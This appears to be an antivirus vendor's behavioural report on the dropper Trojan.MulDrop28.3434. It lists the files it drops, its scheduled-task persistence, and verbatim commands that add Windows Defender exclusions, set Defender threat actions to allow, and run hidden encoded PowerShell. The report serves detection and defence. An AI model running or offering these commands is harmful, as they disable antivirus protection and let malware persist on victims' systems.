Trojan.MulDrop28.3434

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

%WINDIR%\tasks\bvobqgtgladitwblyc.job
<SYSTEM32>\tasks\bvobqgtgladitwblyc

Modifies file system

Creates the following files

%TEMP%\7zsa340.tmp\__data__\config.txt
%TEMP%\7zsa340.tmp\install.exe
%TEMP%\7zsc226.tmp\install.exe
%TEMP%\zhhcbhyhcybdegrge\ymcsryslgaftbgx\ejxrbty.exe
%ALLUSERSPROFILE%\microsoft\crypto\rsa\s-1-5-18\d42cc0c3858a58db2db37658219e6400_d99ef00b-ccd3-4f1d-9980-90ac453b0b47

Miscellaneous

Creates and executes the following

'%TEMP%\7zsa340.tmp\install.exe'
'%TEMP%\7zsc226.tmp\install.exe' /hKdidA "385130" /S
'%TEMP%\zhhcbhyhcybdegrge\ymcsryslgaftbgx\ejxrbty.exe' Sj /rERdidwGX 385130 /S

Executes the following

'%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p <SYS...
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' start-process -WindowStyle Hidden gpupdate.exe /force
'%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
'%WINDIR%\syswow64\gpupdate.exe' /force
'%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gUwyAmsFF" /SC once /ST 00:01:10 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
'%WINDIR%\syswow64\schtasks.exe' /run /I /tn "gUwyAmsFF"
'<SYSTEM32>\gpupdate.exe' /force
'<SYSTEM32>\gpscript.exe' /RefreshSystemParam
'%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gUwyAmsFF"
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
'%WINDIR%\syswow64\cmd.exe' powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
'<SYSTEM32>\taskeng.exe' {16D7CC3E-F1F9-4352-A364-72CEDC9E9F3D} S-1-5-21-3150914307-1777937420-491476919-1000:mfwuozj\user:Interactive:[1]
'<SYSTEM32>\svchost.exe' -k secsvcs
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
'%WINDIR%\syswow64\cmd.exe' reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
'%WINDIR%\syswow64\cmd.exe' reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
'%WINDIR%\syswow64\cmd.exe' reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
'%WINDIR%\syswow64\cmd.exe' reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
'%WINDIR%\syswow64\cmd.exe' powershell start-process -WindowStyle Hidden gpupdate.exe /force
'%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "bvobQgTgLADiTwblyc" /SC once /ST 17:59:00 /RU "SYSTEM" /TR "\"%TEMP%\ZHHcBHyHcybDeGrGE\YMcSRYSLgAFTbGX\EjxRbTy.exe\" Sj /rERdidwGX 385130 /S" /V1 /F
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
'%WINDIR%\syswow64\cmd.exe' powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
'%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
'%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
'%WINDIR%\syswow64\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
'%WINDIR%\syswow64\gpupdate.exe' /force' (with hidden window)
'<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
'%TEMP%\zhhcbhyhcybdegrge\ymcsryslgaftbgx\ejxrbty.exe' Sj /rERdidwGX 385130 /S' (with hidden window)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p <SYS...' (with hidden window)